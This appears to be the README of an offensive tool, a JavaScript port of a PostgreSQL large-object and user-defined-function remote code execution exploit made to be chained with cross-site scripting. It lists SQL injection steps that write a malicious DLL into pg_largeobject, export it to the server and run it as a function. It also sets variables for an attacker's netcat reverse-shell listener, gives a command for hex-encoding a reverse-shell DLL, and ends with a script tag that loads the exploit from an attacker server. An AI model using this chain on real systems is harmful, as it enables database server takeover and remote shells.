PostgreSQL Large Objects and UDF (User Defined Functions) RCE exploit re-written in javascript, for easy chaining with XSS
Step 1: Create a DLL file that will contain our malicious code
Step 2: Inject a query that creates a large object from an arbitrary remote file on disk
Step 3: Inject a query that updates page 0 of the newly created large object with the first 2KB of our DLL
Step 4: Inject queries that insert additional pages into the pg_largeobject table to contain the remainder of our DLL
Step 5: Inject a query that exports our large object (DLL) onto the remote server file system
Step 6: Inject a query that creates a PostgreSQL User Defined Function (UDF) based on our exported DLL
Step 7: Inject a query that executes our newly created UDF
- jQuery: If the target page does not have jQuery included, you can add it from exploit script like this
- Linux/Windows/MAC OSX: To generate postgres extension
Follow this article to generate a database extension for the target machine
https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
Then, set the following variables
var nc_ip = "192.168.XXX.XXX"; //Attacker's netcat listener IP
var nc_port = "4444"; //Attacker's netcat listener port
var url= "/vulnerable-path";
var udf="<Add the database extension hex code here >"; //xxd rev_shell.dll | cut -d" " -f 2-9 | sed 's/ //g' | tr -d '\n' > rev_shell.dll.txt
//Reference: https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions<script src=http://<attacker-server>/postgres_linux_rce.js></script>